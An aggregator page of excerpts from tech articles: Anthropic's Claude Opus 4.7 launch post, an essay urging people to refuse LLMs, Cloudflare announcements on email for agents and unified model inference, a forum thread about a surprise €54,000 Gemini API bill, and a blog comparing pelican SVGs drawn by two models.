10 interesting stories served every morning and every evening.
Our latest model, Claude Opus 4.7, is now generally available. Opus 4.7 is a notable improvement on Opus 4.6 in advanced software engineering, with particular gains on the most difficult tasks. Users report being able to hand off their hardest coding work—the kind that previously needed close supervision—to Opus 4.7 with confidence. Opus 4.7 handles complex, long-running tasks with rigor and consistency, pays precise attention to instructions, and devises ways to verify its own outputs before reporting back.The model also has substantially better vision: it can see images in greater resolution. It’s more tasteful and creative when completing professional tasks, producing higher-quality interfaces, slides, and docs. And—although it is less broadly capable than our most powerful model, Claude Mythos Preview—it shows better results than Opus 4.6 across a range of benchmarks:Last week we announced Project Glasswing, highlighting the risks—and benefits—of AI models for cybersecurity. We stated that we would keep Claude Mythos Preview’s release limited and test new cyber safeguards on less capable models first. Opus 4.7 is the first such model: its cyber capabilities are not as advanced as those of Mythos Preview (indeed, during its training we experimented with efforts to differentially reduce these capabilities). We are releasing Opus 4.7 with safeguards that automatically detect and block requests that indicate prohibited or high-risk cybersecurity uses. What we learn from the real-world deployment of these safeguards will help us work towards our eventual goal of a broad release of Mythos-class models.Security professionals who wish to use Opus 4.7 for legitimate cybersecurity purposes (such as vulnerability research, penetration testing, and red-teaming) are invited to join our new Cyber Verification Program.Opus 4.7 is available today across all Claude products and our API, Amazon Bedrock, Google Cloud’s Vertex AI, and Microsoft Foundry. Pricing remains the same as Opus 4.6: $5 per million input tokens and $25 per million output tokens. Developers can use claude-opus-4-7 via the Claude API.Claude Opus 4.7 has garnered strong feedback from our early-access testers:In early testing, we’re seeing the potential for a significant leap for our developers with Claude Opus 4.7. It catches its own logical faults during the planning phase and accelerates execution, far beyond previous Claude models. As a financial technology platform serving millions of consumers and businesses at significant scale, this combination of speed and precision could be game-changing: accelerating development velocity for faster delivery of the trusted financial solutions our customers rely on every day.Anthropic has already set the standard for coding models, and Claude Opus 4.7 pushes that further in a meaningful way as the state-of-the-art model on the market. In our internal evals, it stands out not just for raw capability, but for how well it handles real-world async workflows—automations, CI/CD, and long-running tasks. It also thinks more deeply about problems and brings a more opinionated perspective, rather than simply agreeing with the user.Claude Opus 4.7 is the strongest model Hex has evaluated. It correctly reports when data is missing instead of providing plausible-but-incorrect fallbacks, and it resists dissonant-data traps that even Opus 4.6 falls for. It’s a more intelligent, more efficient Opus 4.6: low-effort Opus 4.7 is roughly equivalent to medium-effort Opus 4.6.On our 93-task coding benchmark, Claude Opus 4.7 lifted resolution by 13% over Opus 4.6, including four tasks neither Opus 4.6 nor Sonnet 4.6 could solve. Combined with faster median latency and strict instruction following, it’s particularly meaningful for complex, long-running coding workflows. It cuts the friction from those multi-step tasks so developers can stay in the flow and focus on building.Based on our internal research-agent benchmark, Claude Opus 4.7 has the strongest efficiency baseline we’ve seen for multi-step work. It tied for the top overall score across our six modules at 0.715 and delivered the most consistent long-context performance of any model we tested. On General Finance—our largest module—it improved meaningfully on Opus 4.6, scoring 0.813 versus 0.767, while also showing the best disclosure and data discipline in the group. And on deductive logic, an area where Opus 4.6 struggled, Opus 4.7 is solid.Claude Opus 4.7 extends the limit of what models can do to investigate and get tasks done. Anthropic has clearly optimized for sustained reasoning over long runs, and it shows with market-leading performance. As engineers shift from working 1:1 with agents to managing them in parallel, this is exactly the kind of frontier capability that unlocks new workflows.We’re seeing major improvements in Claude Opus 4.7’s multimodal understanding, from reading chemical structures to interpreting complex technical diagrams. The higher resolution support is helping Solve Intelligence build best-in-class tools for life sciences patent workflows, from drafting and prosecution to infringement detection and invalidity charting.Claude Opus 4.7 takes long-horizon autonomy to a new level in Devin. It works coherently for hours, pushes through hard problems rather than giving up, and unlocks a class of deep investigation work we couldn’t reliably run before.For Replit, Claude Opus 4.7 was an easy upgrade decision. For the work our users do every day, we observed it achieving the same quality at lower cost—more efficient and precise at tasks like analyzing logs and traces, finding bugs, and proposing fixes. Personally, I love how it pushes back during technical discussions to help me make better decisions. It really feels like a better coworker.Claude Opus 4.7 demonstrates strong substantive accuracy on BigLaw Bench for Harvey, scoring 90.9% at high effort with better reasoning calibration on review tables and noticeably smarter handling of ambiguous document editing tasks. It correctly distinguishes assignment provisions from change-of-control provisions, a task that has historically challenged frontier models. Substance was consistently rated as a strength across our evaluations: correct, thorough, and well-cited.Claude Opus 4.7 is a very impressive coding model, particularly for its autonomy and more creative reasoning. On CursorBench, Opus 4.7 is a meaningful jump in capabilities, clearing 70% versus Opus 4.6 at 58%.For complex multi-step workflows, Claude Opus 4.7 is a clear step up: plus 14% over Opus 4.6 at fewer tokens and a third of the tool errors. It’s the first model to pass our implicit-need tests, and it keeps executing through tool failures that used to stop Opus cold. This is the reliability jump that makes Notion Agent feel like a true teammate.In our evals, we saw a double-digit jump in accuracy of tool calls and planning in our core orchestrator agents. As users leverage Hebbia to plan and execute on use cases like retrieval, slide creation, or document generation, Claude Opus 4.7 shows the potential to improve agent decision-making in these workflows.On Rakuten-SWE-Bench, Claude Opus 4.7 resolves 3x more production tasks than Opus 4.6, with double-digit gains in Code Quality and Test Quality. This is a meaningful lift and a clear upgrade for the engineering work our teams are shipping every day.For CodeRabbit’s code review workloads, Claude Opus 4.7 is the sharpest model we’ve tested. Recall improved by over 10%, surfacing some of the most difficult-to-detect bugs in our most complex PRs, while precision remained stable despite the increased coverage. It’s a bit faster than GPT-5.4 xhigh on our harness, and we’re lining it up for our heaviest review work at launch.For Genspark’s Super Agent, Claude Opus 4.7 nails the three production differentiators that matter most: loop resistance, consistency, and graceful error recovery. Loop resistance is the most critical. A model that loops indefinitely on 1 in 18 queries wastes compute and blocks users. Lower variance means fewer surprises in prod. And Opus 4.7 achieves the highest quality-per-tool-call ratio we’ve measured.Claude Opus 4.7 is a meaningful step up for Warp. Opus 4.6 is one of the best models out there for developers, and this model is measurably more thorough on top of that. It passed Terminal Bench tasks that prior Claude models had failed, and worked through a tricky concurrency bug Opus 4.6 couldn’t crack. For us, that’s the signal.Claude Opus 4.7 is the best model in the world for building dashboards and data-rich interfaces. The design taste is genuinely surprising—it makes choices I’d actually ship. It’s my default daily driver now.Claude Opus 4.7 is the most capable model we’ve tested at Quantium. Evaluated against leading AI models through our proprietary benchmarking solution, the biggest gains showed up where they matter most: reasoning depth, structured problem-framing, and complex technical work. Fewer corrections, faster iterations, and stronger outputs to solve the hardest problems our clients bring us.Claude Opus 4.7 feels like a real step up in intelligence. Code quality is noticeably improved, it’s cutting out the meaningless wrapper functions and fallback scaffolding that used to pile up, and fixes its own code as it goes. It’s the cleanest jump we’ve seen since the move from Sonnet 3.7 to the Claude 4 series.For the computer-use work that sits at the heart of XBOW’s autonomous penetration testing, the new Claude Opus 4.7 is a step change: 98.5% on our visual-acuity benchmark versus 54.5% for Opus 4.6. Our single biggest Opus pain point effectively disappeared, and that unlocks its use for a whole class of work where we couldn’t use it before.Claude Opus 4.7 is a solid upgrade with no regressions for Vercel. It’s phenomenal on one-shot coding tasks, more correct and complete than Opus 4.6, and noticeably more honest about its own limits. It even does proofs on systems code before starting work, which is new behavior we haven’t seen from earlier Claude models.Claude Opus 4.7 is very strong and outperforms Opus 4.6 with a 10% to 15% lift in task success for Factory Droids, with fewer tool errors and more reliable follow-through on validation steps. It carries work all the way through instead of stopping halfway, which is exactly what enterprise engineering teams need.Claude Opus 4.7 autonomously built a complete Rust text-to-speech engine from scratch—neural model, SIMD kernels, browser demo—then fed its own output through a speech recognizer to verify it matched the Python reference. Months of senior engineering, delivered autonomously. The step up from Opus 4.6 is clear, and the codebase is public.Claude Opus 4.7 passed three TBench tasks that prior Claude models couldn’t, and it’s landing fixes our previous best model missed, including a race condition. It demonstrates strong precision in identifying real issues, and surfaces important findings that other models either gave up on or didn’t resolve. In Qodo’s real-world code review benchmark, we observed top-tier precision.On Databricks’ OfficeQA Pro, Claude Opus 4.7 shows meaningfully stronger document reasoning, with 21% fewer errors than Opus 4.6 when working with source information. Across our agentic reasoning over data benchmarks, it is the best-performing Claude model for enterprise document analysis.For Ramp, Claude Opus 4.7 stands out in agent-team workflows. We’re seeing stronger role fidelity, instruction-following, coordination, and complex reasoning, especially on engineering tasks that span tools, codebases, and debugging context. Compared with Opus 4.6, it needs much less step-by-step guidance, helping us scale the internal agent workflows our engineering teams run.Claude Opus 4.7 is measurably better than Opus 4.6 for Bolt’s longer-running app-building work, up to 10% better in the best cases, without the regressions we’ve come to expect from very agentic models. It pushes the ceiling on what our users can ship in a single session.Below are some highlights and notes from our early testing of Opus 4.7:Instruction following. Opus 4.7 is substantially better at following instructions. Interestingly, this means that prompts written for earlier models can sometimes now produce unexpected results: where previous models interpreted instructions loosely or skipped parts entirely, Opus 4.7 takes the instructions literally. Users should re-tune their prompts and harnesses accordingly.Improved multimodal support. Opus 4.7 has better vision for high-resolution images: it can accept images up to 2,576 pixels on the long edge (~3.75 megapixels), more than three times as many as prior Claude models. This opens up a wealth of multimodal uses that depend on fine visual detail: computer-use agents reading dense screenshots, data extractions from complex diagrams, and work that needs pixel-perfect references.1Real-world work. As well as its state-of-the-art score on the Finance Agent evaluation (see table above), our internal testing showed Opus 4.7 to be a more effective finance analyst than Opus 4.6, producing rigorous analyses and models, more professional presentations, and tighter integration across tasks. Opus 4.7 is also state-of-the-art on GDPval-AA, a third-party evaluation of economically valuable knowledge work across finance, legal, and other domains.Memory. Opus 4.7 is better at using file system-based memory. It remembers important notes across long, multi-session work, and uses them to move on to new tasks that, as a result, need less up-front context.The charts below display more evaluation results from our pre-release testing, across a range of different domains:Overall, Opus 4.7 shows a similar safety profile to Opus 4.6: our evaluations show low rates of concerning behavior such as deception, sycophancy, and cooperation with misuse. On some measures, such as honesty and resistance to malicious “prompt injection” attacks, Opus 4.7 is an improvement on Opus 4.6; in others (such as its tendency to give overly detailed harm-reduction advice on controlled substances), Opus 4.7 is modestly weaker. Our alignment assessment concluded that the model is “largely well-aligned and trustworthy, though not fully ideal in its behavior”. Note that Mythos Preview remains the best-aligned model we’ve trained according to our evaluations. Our safety evaluations are discussed in full in the Claude Opus 4.7 System Card.Overall misaligned behavior score from our automated behavioral audit. On this evaluation, Opus 4.7 is a modest improvement on Opus 4.6 and Sonnet 4.6, but Mythos Preview still shows the lowest rates of misaligned behavior.In addition to Claude Opus 4.7 itself, we’re launching the following updates:More effort control: Opus 4.7 introduces a new xhigh (“extra high”) effort level between high and max, giving users finer control over the tradeoff between reasoning and latency on hard problems. In Claude Code, we’ve raised the default effort level to xhigh for all plans. When testing Opus 4.7 for coding and agentic use cases, we recommend starting with high or xhigh effort.On the Claude Platform (API): as well as support for higher-resolution images, we’re also launching task budgets in public beta, giving developers a way to guide Claude’s token spend so it can prioritize work across longer runs.In Claude Code: The new /ultrareview slash command produces a dedicated review session that reads through changes and flags bugs and design issues that a careful reviewer would catch. We’re giving Pro and Max Claude Code users three free ultrareviews to try it out. In addition, we’ve extended auto mode to Max users. Auto mode is a new permissions option where Claude makes decisions on your behalf, meaning that you can run longer tasks with fewer interruptions—and with less risk than if you had chosen to skip all permissions.Opus 4.7 is a direct upgrade to Opus 4.6, but two changes are worth planning for because they affect token usage. First, Opus 4.7 uses an updated tokenizer that improves how the model processes text. The tradeoff is that the same input can map to more tokens—roughly 1.0–1.35× depending on the content type. Second, Opus 4.7 thinks more at higher effort levels, particularly on later turns in agentic settings. This improves its reliability on hard problems, but it does mean it produces more output tokens. Users can control token usage in various ways: by using the effort parameter, adjusting their task budgets, or prompting the model to be more concise. In our own testing, the net effect is favorable—token usage across all effort levels is improved on an internal coding evaluation, as shown below—but we recommend measuring the difference on real traffic. We’ve written a migration guide that provides further advice on upgrading from Opus 4.6 to Opus 4.7.Score on an internal agentic coding evaluation as a function of token usage at each effort level. In this evaluation, the model works autonomously from a single user prompt, and results may not be representative of token usage in interactive coding. See the migration guide for more on tuning effort levels.
...
Read the original on www.anthropic.com »
Some readers are undoubtedly upset that I have not devoted more space to the wonders of machine learning—how amazing LLMs are at code generation, how incredible it is that Suno can turn hummed melodies into polished songs. But this is not an article about how fast or convenient it is to drive a car. We all know cars are fast. I am trying to ask what will happen to the shape of
cities.
The personal automobile reshaped
streets, all but extinguished urban horses and their
waste,
supplanted local
transit
and interurban railways, germinated new building
typologies,
decentralized
cities, created exurban
sprawl,
reduced incidental social
contact, gave rise to the Interstate Highway
System (bulldozing
Black
communities
in the process), gave everyone lead
poisoning, and became a leading
cause of death
among young people. Many parts of the US are highly
car-dependent, even though a
third of us don’t
drive. As a driver, cyclist, transit rider, and pedestrian, I think about this legacy every day: how so much of our lives are shaped by the technology of personal automobiles, and the specific way the US uses them.
I want you to think about “AI” in this sense.
Some of our possible futures are grim, but manageable. Others are downright terrifying, in which large numbers of people lose their homes, health, or lives. I don’t have a strong sense of what will happen, but the space of possible futures feels much broader in 2026 than it did in 2022, and most of those futures feel bad.
Much of the bullshit future is already here, and I am profoundly tired of it. There is slop in my search results, at the gym, at the doctor’s office. Customer service, contractors, and engineers use LLMs to blindly lie to me. The electric company has hiked our rates and says data centers are to blame. LLM scrapers take down the web sites I run and make it harder to access the services I rely on. I watch synthetic videos of suffering animals and stare at generated web pages which lie about police brutality. There is LLM spam in my inbox and synthetic CSAM on my moderation dashboard. I watch people outsource their work, food, travel, art, even relationships to ChatGPT. I read chatbots lining the delusional warrens of mental health crises.
I am asked to analyze vaporware and to disprove nonsensical claims. I wade through voluminous LLM-generated pull requests. Prospective clients ask Claude to do the work they might have hired me for. Thankfully Claude’s code is bad, but that could change, and that scares me. I worry about losing my home. I could retrain, but my core skills—reading, thinking, and writing—are squarely in the blast radius of large language models. I imagine going to school to become an architect, just to watch ML eat that field too.
It is deeply alienating to see so many of my peers wildly enthusiastic about ML’s potential applications, and using it personally. Governments and industry seem all-in on “AI”, and I worry that by doing so, we’re hastening the arrival of unpredictable but potentially devastating consequences—personal, cultural, economic, and humanitarian.
I’ve thought about this a lot over the last few years, and I think the best
response is to stop. ML assistance reduces our performance and
persistence, and denies us both the muscle memory and deep theory-building that comes with working through a task by hand: the cultivation of what James C. Scott would
call
metis. I have never used an LLM for my writing, software, or personal life, because I care about my ability to write well, reason deeply, and stay grounded in the world. If I ever adopt ML tools in more than an exploratory capacity, I will need to take great care. I also try to minimize what I consume from LLMs. I read cookbooks written by human beings, I trawl through university websites to identify wildlife, and I talk through my problems with friends.
I think you should do the same.
Refuse to insult your readers: think your own thoughts and write your own words. Call out
people
who send you slop. Flag ML hazards at work and with friends. Stop paying for ChatGPT at home, and convince your company not to sign a deal for Gemini. Form or join a labor union, and push back against management demands that you adopt
Copilot—after all, it’s for entertainment purposes
only. Call your members of Congress and demand aggressive regulation which holds ML companies responsible for their
carbon
and
digital
emissions. Advocate against tax breaks for ML
datacenters. If you work at Anthropic, xAI, etc., you should think seriously about your
role in making the
future. To be frank, I think you should quit your
job.
I don’t think this will stop ML from advancing altogether: there are still lots of people who want to make it happen. It will, however, slow them down, and this is good. Today’s models are already very capable. It will take time for the effects of the existing technology to be fully felt, and for culture, industry, and government to adapt. Each day we delay the advancement of ML models buys time to learn how to manage technical debt and errors introduced in legal filings. Another day to prepare for ML-generated CSAM, sophisticated fraud, obscure software vulnerabilities, and AI Barbie. Another day for workers to find new jobs.
Staving off ML will also assuage your conscience over the coming decades. As someone who once quit an otherwise good job on ethical grounds, I feel good about that decision. I think you will too.
And if I’m wrong, we can always build it later.
Despite feeling a bitter distaste for this generation of ML systems and the people who brought them into existence, they do seem useful. I want to use them. I probably will at some point.
For example, I’ve got these color-changing lights. They speak a protocol I’ve never heard of, and I have no idea where to even begin. I could spend a month digging through manuals and working it out from scratch—or I could ask an LLM to write a client library for me. The security consequences are minimal, it’s a constrained use case that I can verify by hand, and I wouldn’t be pushing tech debt on anyone else. I still write plenty of code, and I could stop any time. What would be the harm?
Many friends contributed discussion, reading material, and feedback on this article. My heartfelt thanks to Peter Alvaro, Kevin Amidon, André Arko, Taber Bain, Silvia Botros, Daniel Espeset, Julia Evans, Brad Greenlee, Coda Hale, Marc Hedlund, Sarah Huffman, Dan Mess, Nelson Minar, Alex Rasmussen, Harper Reed, Daliah Saper, Peter Seibel, Rhys Seiffe, and James Turnbull.
This piece, like most all my words and software, was written by hand—mainly in Vim. I composed a Markdown outline in a mix of headers, bullet points, and prose, then reorganized it in a few passes. With the structure laid out, I rewrote the outline as prose, typeset with Pandoc. I went back to make substantial edits as I wrote, then made two full edit passes on typeset PDFs. For the first I used an iPad and stylus, for the second, the traditional pen and paper, read aloud.
I circulated the resulting draft among friends for their feedback before publication. Incisive ideas and delightful turns of phrase may be attributed to them; any errors or objectionable viewpoints are, of course, mine alone.
...
Read the original on aphyr.com »
Email is the most accessible interface in the world. It is ubiquitous. There’s no need for a custom chat application, no custom SDK for each channel. Everyone already has an email address, which means everyone can already interact with your application or agent. And your agent can interact with anyone.
If you are building an application, you already rely on email for signups, notifications, and invoices. Increasingly, it is not just your application logic that needs this channel. Your agents do, too. During our private beta, we talked to developers who are building exactly this: customer support agents, invoice processing pipelines, account verification flows, multi-agent workflows. All built on top of email. The pattern is clear: email is becoming a core interface for agents, and developers need infrastructure purpose-built for it.
Cloudflare Email Service is that piece. With Email Routing, you can receive email to your application or agent. With Email Sending, you can reply to emails or send outbounds to notify your users when your agents are done doing work. And with the rest of the developer platform, you can build a full email client and Agents SDK onEmail hook as native functionality.
Today, as part of Agents Week, Cloudflare Email Service is entering public beta, allowing any application and any agent to send emails. We are also completing the toolkit for building email-native agents:
Email Sending binding, available from your Workers and the Agents SDK
Email Sending graduates from private beta to public beta today. You can now send transactional emails directly from Workers with a native Workers binding — no API keys, no secrets management.
export default {
async fetch(request, env, ctx) {
await env. EMAIL.send({
to: “[email protected]”,
from: “[email protected]”,
subject: “Your order has shipped”,
text: “Your order #1234 has shipped and is on its way.”
return new Response(“Email sent”);
Or send from any platform, any language, using the REST API and our TypeScript, Python, and Go SDKs:
–header “Content-Type: application/json” \
–data ’{
“to”: “[email protected]”,
“from”: “[email protected]”,
“subject”: “Your order has shipped”,
“text”: “Your order #1234 has shipped and is on its way.”
Sending email that actually reaches inboxes usually means wrestling with SPF, DKIM, and DMARC records. When you add your domain to Email Service, we configure all of it automatically. Your emails are authenticated and delivered, not flagged as spam. And because Email Service is a global service built on Cloudflare’s network, your emails are delivered with low latency anywhere in the world.
Combined with Email Routing, which has been free and available for years, you now have complete bidirectional email within a single platform. Receive an email, process it in a Worker, and reply, all without leaving Cloudflare.
For the full deep dive on Email Sending, refer to our Birthday Week announcement. The rest of this post describes what Email Service unlocks for agents.
The Agents SDK for building agents on Cloudflare already has a first-class onEmail hook for receiving and processing inbound email. But until now, your agent could only reply synchronously, or send emails to members of your Cloudflare account.
With Email Sending, that constraint is gone. This is the difference between a chatbot and an agent.
Email agents receive a message, orchestrate work across the platform, and respond asynchronously.
A chatbot responds in the moment or not at all. An agent thinks, acts, and communicates on its own timeline. With Email Sending, your agent can receive a message, spend an hour processing data, check three other systems, and then reply with a complete answer. It can schedule follow-ups. It can escalate when it detects an edge case. It can operate independently. In other words: it can actually do work, not just answer questions.
Here’s what a support agent looks like with the full pipeline — receive, persist, and reply:
import { Agent, routeAgentEmail } from “agents”;
import { createAddressBasedEmailResolver, type AgentEmail } from “agents/email”;
import PostalMime from “postal-mime”;
export class SupportAgent extends Agent {
async onEmail(email: AgentEmail) {
const raw = await email.getRaw();
const parsed = await PostalMime.parse(raw);
// Persist in agent state
this.setState({
…this.state,
ticket: { from: email.from, subject: parsed.subject, body: parsed.text, messageId: parsed.messageId },
// Kick off long running background agent task
// Or place a message on a Queue to be handled by another Worker
// Reply here or in other Worker handler, like a Queue handler
await this.sendEmail({
binding: this.env. EMAIL,
fromName: “Support Agent”,
from: “[email protected]”,
to: this.state.ticket.from,
inReplyTo: this.state.ticket.messageId,
subject: `Re: ${this.state.ticket.subject}`,
text: `Thanks for reaching out. We received your message about “${this.state.ticket.subject}” and will follow up shortly.`
export default {
async email(message, env) {
await routeAgentEmail(message, env, {
resolver: createAddressBasedEmailResolver(“SupportAgent”),
} satisfies ExportedHandler
If you’re new to the Agents SDK’s email capabilities, here’s what’s happening under the hood.
Each agent gets its own identity from a single domain. The address-based resolver routes [email protected] to a “support” agent instance, [email protected] to a “sales” instance, and so on. You don’t need to provision separate inboxes — the routing is built into the address. You can even use sub-addressing ([email protected]) to route to different agent namespaces and instances.
State persists across emails. Because agents are backed by Durable Objects, calling this.setState() means your agent remembers conversation history, contact information, and context across sessions. The inbox becomes the agent’s memory, without needing a separate database or vector store.
Secure reply routing is built in. When your agent sends an email and expects a reply, you can sign the routing headers with HMAC-SHA256 so that replies route back to the exact agent instance that sent the original message. This prevents attackers from forging headers to route emails to arbitrary agent instances — a security concern that most “email for agents” solutions haven’t addressed.
This is the complete email agent pipeline that teams are building from scratch elsewhere: receive email, parse it, classify it, persist state, kick off async workflows, reply or escalate — all within a single Agent class, deployed globally on Cloudflare’s network.
Email Service isn’t only for agents running on Cloudflare. Agents run everywhere, whether it’s coding agents like Claude Code, Cursor, or Copilot running locally or in remote environments, or production agents running in containers or external clouds. They all need to send email from those environments. We’re shipping three integrations that make Email Service accessible to any agent, regardless of where it runs.
Email is now available through the Cloudflare MCP server, the same Code Mode-powered server that gives agents access to the entire Cloudflare API. With this MCP server, your agent can discover and call the Email endpoints to send and configure emails. You can send an email with a simple prompt:
“Send me a notification email at [email protected] from my staging domain when the build completes”
For agents running on a computer or a sandbox with bash access, the Wrangler CLI solves the MCP context window problem that we discussed in the Code Mode blog post — tool definitions can consume tens of thousands of tokens before your agent even starts processing a single message. With Wrangler, your agent starts with near-zero context overhead and discovers capabilities on demand through `–help` commands. Here is how your agent can send an email via Wrangler:
wrangler email send \
–to “[email protected]” \
–from “[email protected]” \
–subject “Build completed” \
–text “The build passed. Deployed to staging.”
Regardless of whether you give your agent the Cloudflare MCP or the Wrangler CLI, your agent will be able to now send emails on your behalf with just a prompt.
We are also publishing a Cloudflare Email Service skill. It gives your agents complete guidance: configuring the Workers binding, sending emails via the REST API or SDKs, handling inbound email with Email Routing configuration, building with Agents SDK, and managing email through Wrangler CLI or MCP. It also covers deliverability best practices and how to craft good transactional emails that land in inboxes rather than spam. Drop it into your project and your coding agent has everything needed to build production-ready email on Cloudflare.
During the private beta, we also experimented with email agents. It became clear that you often want to keep the human-in-the-loop element to review emails and see what the agent is doing. The best way to do that is to have a fully featured email client with agent automations built-in.
That’s why we built Agentic Inbox: a reference application with full conversation threading, email rendering, receiving and storing emails and their attachments, and automatically replying to emails. It includes a dedicated MCP server built-in, so external agents can draft emails for your review before sending from your agentic-inbox.
We’re open-sourcing Agentic Inbox as a reference application for how to build a full email application using Email Routing for inbound, Email Sending for outbound, Workers AI for classification, R2 for attachments, and Agents SDK for stateful agent logic. You can deploy it today to get a full inbox, email client and agent for your emails, with the click of a button.
We want email agent tooling to be composable and reusable. Rather than every team rebuilding the same inbound-classify-reply pipeline, start with this reference application. Fork it, extend it, use it as a starting point for your own email agents that fit your workflows.
Email is where the world’s most important workflows live, but for agents, it has often been a difficult channel to reach. With Email Sending now in public beta, Cloudflare Email Service becomes a complete platform for bidirectional communication, making the inbox a first-class interface for your agents.
Whether you’re building a support agent that meets customers in their inbox or a background process that keeps your team updated in real time, your agents now have a seamless way to communicate on a global scale. The inbox is no longer a silo. Now it’s one more place for your agents to be helpful.
Try out Email Sending in the Cloudflare DashboardCheck out the Email Service MCP server and Skills
...
Read the original on blog.cloudflare.com »
We are looking for guidance regarding an unexpected €54,000+ Gemini API charge that occurred within a few hours after enabling Firebase AI Logic on an existing Firebase project.
We created the project over a year ago and initially used it only for Firebase Authentication. Recently, we added a simple AI feature (generating a web snippet from a text prompt) and enabled Firebase AI Logic.
Shortly after enabling this, we experienced a sudden and extreme spike in Gemini API usage. The traffic was not correlated with our actual users and appeared to be automated. The activity occurred within a short overnight window and stopped once we disabled the API and rotated credentials.
We had a budget alert (€80) and a cost anomaly alert, both of which triggered with a delay of a few hours
By the time we reacted, costs were already around €28,000
The final amount settled at €54,000+ due to delayed cost reporting
This describes our issue in more detail:
Google API Keys Weren’t Secrets. But then Gemini Changed the Rules. ◆ Truffle…
Google spent over a decade telling developers that Google API keys (like those used in Maps, Firebase, etc.) are not secrets. But that’s no longer true.
We worked with Google Cloud support and provided logs and analysis. The charges were classified as valid usage because they originated from our project, and our request for a billing adjustment was ultimately denied.
This usage was clearly anomalous, not user-driven, and does not reflect intended or meaningful consumption of the service.
Has anyone encountered a similar issue after enabling Firebase AI Logic or Gemini?
Are there recommended safeguards beyond App Check, quotas, and moving calls server-side?
Is there any escalation path we may have missed for cases like this?
Any guidance or shared experience would be greatly appreciated.
Hey @zanbezi ! Sorry to hear about this. A few things:
We have billing account caps rolled out to users of the Gemini API, see: https://ai.google.dev/gemini-api/docs/billing#tier-spend-caps, tier 1 users can spend $250 a month and then are cut off by default (there is a 10 minute delay in all of the reporting)
We now support project spend caps, if you want to set a customer spend cap, you can also do that (I have my account set at $50 so I don’t spend too much accidenlty when building, the same 10 minute delay applies here too): https://ai.google.dev/gemini-api/docs/billing#project-spend-caps
We are moving to disable the usage of unrestricted API keys in the Gemini API, should have more updates there soon.
We now generate Auth keys by default for new users (more secure key which didn’t exist when the Gemini API was originally created a few years ago) and will have more to share there soon.
You should generally avoid putting a key in client side code as if it is exposed, even with the restrictions above you can incur costs.
In many cases, we can automatically detect when a key is visible on the public web and shut down those keys automatically for security reasons (this happened to me personally, I accidentally pushed my API key to the public API docs and it was shut down in minutes).
By default, keys generated in Google AI Studio are restricted to just the Gemini API, no other services are enabled. However keys generated from other parts of Google Cloud have this cross service capability, you can double check keys and make sure they are restricted for just the resource you need.
Pls email me and our team can take a look into this case (Lkilpatrick@google.com), we take this all very serious and have been pushing hard to land all the features mentioned above and more.
We just started the prepaid billing rollout which means you have to pay ahead of time to use the Gemini API, this is rolled out to all new US billing accounts as of yesterday and rolling out globally right now. This is yet another way to give developers more control over their spending / costs and ensure you know what you are signing up for when using the Gemini API.
I hope this helps and sorry for the hassle on this experience, pls email me if there is more to chat about!
Thanks for the detailed response, we really appreciate it. It is good to see that additional safeguards (like spend caps) are being introduced.
I will reach out via email with the details so your team can take a closer look.
Thanks again for taking the time to respond.
Great to see you here Logan. This is the proper way to deal with a fiasco like this one.
We work with companies spending $50K–$50M/year on cloud and see an average 33% overspend. The fix usually isn’t better dashboards — it’s having engineers actually review architecture and code alongside the billing data.
We’ve helped clients cut 25–60% by treating it as an engineering problem, not a reporting one. Happy to share more if useful.
...
Read the original on discuss.ai.google.dev »
For anyone who has been (inadvisably) taking my pelican riding a bicycle benchmark seriously as a robust way to test models, here are pelicans from this morning’s two big model releases—Qwen3.6-35B-A3B from Alibaba and Claude Opus 4.7 from Anthropic.
Here’s the Qwen 3.6 pelican, generated using this 20.9GB Qwen3.6-35B-A3B-UD-Q4_K_S.gguf quantized model by Unsloth, running on my MacBook Pro M5 via LM Studio (and the llm-lmstudio plugin)—transcript here:
And here’s one I got from Anthropic’s brand new Claude Opus 4.7 (transcript):
I’m giving this one to Qwen 3.6. Opus managed to mess up the bicycle frame!
I tried Opus a second time passing thinking_level: max. It didn’t do much better (transcript):
A lot of people are convinced that the labs train for my stupid benchmark. I don’t think they do, but honestly this result did give me a little glint of suspicion. So I’m burning one of my secret backup tests—here’s what I got from Qwen3.6-35B-A3B and Opus 4.7 for “Generate an SVG of a flamingo riding a unicycle”:
I’m giving this one to Qwen too, partly for the excellent SVG comment.
The pelican benchmark has always been meant as a joke—it’s mainly a statement on how obtuse and absurd the task of comparing these models is.
The weird thing about that joke is that, for the most part, there has been a direct correlation between the quality of the pelicans produced and the general usefulness of the models. Those first pelicans from October 2024 were junk. The more recent entries have generally been much, much better—to the point that Gemini 3.1 Pro produces illustrations you could actually use somewhere, provided you had a pressing need to illustrate a pelican riding a bicycle.
Today, even that loose connection to utility has been broken. I have enormous respect for Qwen, but I very much doubt that a 21GB quantized version of their latest model is more powerful or useful than Anthropic’s latest proprietary release.
If the thing you need is an SVG illustration of a pelican riding a bicycle though, right now Qwen3.6-35B-A3B running on a laptop is a better bet than Opus 4.7!
...
Read the original on simonwillison.net »
...
Read the original on www.thunderbolt.io »
AI models are changing quickly: the best model to use for agentic coding today might in three months be a completely different model from a different provider. On top of this, real-world use cases often require calling more than one model. Your customer support agent might use a fast, cheap model to classify a user’s message; a large, reasoning model to plan its actions; and a lightweight model to execute individual tasks.
This means you need access to all the models, without tying yourself financially and operationally to a single provider. You also need the right systems in place to monitor costs across providers, ensure reliability when one of them has an outage, and manage latency no matter where your users are.
These challenges are present whenever you’re building with AI, but they get even more pressing when you’re building agents. A simple chatbot might make one inference call per user prompt. An agent might chain ten calls together to complete a single task and suddenly, a single slow provider doesn’t add 50ms, it adds 500ms. One failed request isn’t a retry, but suddenly a cascade of downstream failures.
Since launching AI Gateway and Workers AI, we’ve seen incredible adoption from developers building AI-powered applications on Cloudflare and we’ve been shipping fast to keep up! In just the past few months, we’ve refreshed the dashboard, added zero-setup default gateways, automatic retries on upstream failures, and more granular logging controls. Today, we’re making Cloudflare into a unified inference layer: one API to access any AI model from any provider, built to be fast and reliable.
Starting today, you can call third-party models using the same AI.run() binding you already use for Workers AI. If you’re using Workers, switching from a Cloudflare-hosted model to one from OpenAI, Anthropic, or any other provider is a one-line change.
For those who don’t use Workers, we’ll be releasing REST API support in the coming weeks, so you can access the full model catalog from any environment.
We’re also excited to share that you’ll now have access to 70+ models across 12+ providers — all through one API, one line of code to switch between them, and one set of credits to pay for them. And we’re quickly expanding this as we go.
